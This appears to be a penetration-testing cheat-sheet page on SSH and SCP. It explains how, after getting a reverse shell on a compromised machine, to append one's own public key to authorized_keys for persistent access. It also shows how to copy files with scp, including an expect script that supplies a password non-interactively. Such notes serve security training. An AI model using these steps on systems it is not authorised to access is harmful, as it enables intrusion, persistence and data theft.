⭕SSH
SSH - SCP
Generate Key Pair
if you manage to upload a reverse-shell and get access to the machine you might be able to enter using ssh. Which might give you a better shell and more stability, and all the other features of SSH. Like transferring files.
So, in the /home/user directory you can find the hidden .ssh files by typing ls -la. Then you need to do two things:
Create a new keypair, You do that with:
ssh-keygen -t rsa -C "[email protected]"This will create two files, one called nameOfMyKey and another called nameOfMyKey_pub. The one with the _pub is of course your public key. And the other key is your private.
Add your public key to authorized_keys.
Now you copy the content of nameOfMyKey_pub. On the compromised machine you go to ~/.ssh and then run add the public key to the file authorized_keys. Like this
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQqlhJKYtL/r9655iwp5TiUM9Khp2DJtsJVW3t5qU765wR5Ni+ALEZYwqxHPNYS/kZ4Vdv..." > authorized_keysLog in.
ssh -i nameOfMyKey [email protected]SCP File Transfer
Copy a file:
scp /path/to/source/file.ext [email protected]:/path/to/destination/file.extCopy a directory:
scp -r /path/to/source/dir [email protected]:/path/to/destinationnon-interactive SCP
The only reason that a one-liner doesn’t work is because SCP prompts the user for a password, and simply echoing the password and piping it to the command won’t work. The list of commands to build the file looks like this:
echo '#!/usr/bin/expect' > scp.exp
echo 'spawn scp username@ip-addr:/path-to-file out-file' >> scp.exp
echo 'set pass "password"' >> scp.exp
echo 'expect {' >> scp.exp
echo 'password: {send "$pass\r"; exp_continue}' >> scp.exp
echo '}' >> scp.expTo run this file
expect scp.expLast updated